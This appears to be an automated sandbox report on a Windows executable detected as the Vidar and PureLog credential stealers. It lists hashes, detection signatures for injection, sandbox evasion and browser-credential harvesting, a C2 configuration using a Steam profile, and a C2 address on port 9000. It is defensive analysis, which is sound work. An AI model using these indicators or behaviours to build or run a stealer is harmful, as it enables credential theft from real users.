Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1437185
MD5: b9773393891d9cc471cd58cac09052dd
SHA1: 784a14954c7abca7d7e2e92c60b93557238426f4
SHA256: 0a8357cb9a1d348d1c4b4ec101f2328fd43f976803bcc360525ced55fbb9aeaf
Tags: exe
Infos:

Detection

PureLog Stealer, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Vidar stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B9773393891D9CC471CD58CAC09052DD)
    • RegAsm.exe (PID: 5816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "ad7dbf02afc50b46afd33ddc12f41082", "Version": "9.4"}
Source | Rule | Description | Author | Strings
file.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000000.00000000.1628578580.00000000009A2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x211f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x211e8:$s2: HAL9TH
Process Memory Space: file.exe PID: 3228 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.0.file.exe.9a0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
1.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
1.2.RegAsm.exe.400000.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x211f0:$s1: JohnDoe
  • 0x31f80:$s1: JohnDoe
  • 0x211e8:$s2: HAL9TH
0.2.file.exe.3d65570.0.raw.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0.2.file.exe.3d65570.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation | Detects executables containing potential Windows Defender anti-emulation checks | ditekSHen |
  • 0x1fbf0:$s1: JohnDoe
  • 0x1fbe8:$s2: HAL9TH

No Sigma rule has matched
No Snort rule has matched

                  AV Detection

                  Source: file.exeAvira: detected
                  Source: 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199680449169"], "Botnet": "ad7dbf02afc50b46afd33ddc12f41082", "Version": "9.4"}
                  Source: https://65.108.152.56:9000/WVirustotal: Detection: 8%Perma Link
                  Source: https://65.108.152.56:9000/DVirustotal: Detection: 6%Perma Link
                  Source: https://65.108.152.56:9000/sqlx.dllgVirustotal: Detection: 8%Perma Link
                  Source: file.exeReversingLabs: Detection: 63%
                  Source: file.exeVirustotal: Detection: 42%Perma Link
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004062F1 CryptUnprotectData,LocalAlloc,LocalFree,1_2_004062F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040628E CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_0040628E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040832A memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,1_2_0040832A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040247E memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,1_2_0040247E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FD97 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_0040FD97
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.105.90.131:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: NETCrypt.pdb source: file.exe
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2882085104.0000000015737000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040B700 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,1_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041531B _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_0041531B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414462 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,1_2_00414462
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409531 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_00409531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040994C _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040994C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414B2E _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00414B2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00414ED2 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00414ED2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00409FBE _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409FBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004148AF _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_004148AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                  Networking

                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199680449169
                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 65.108.152.56:9000
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199680449169 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 104.105.90.131 104.105.90.131
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownTCP traffic detected without corresponding DNS query: 65.108.152.56
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004041D4 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_004041D4
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=roSu
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=sV4C07YVtT0V&amp
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/r
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/toolt
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                  Source: IEHJJE.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: IEHJJE.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: IEHJJE.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199680449169
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.1632108400.0000000003D65000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2880922498.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/badges
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199680449169/inventory/
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/stats/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                  Source: RegAsm.exe, 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2880922498.0000000000DBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.comv
                  Source: RegAsm.exe, 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmp, HDBKJE.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
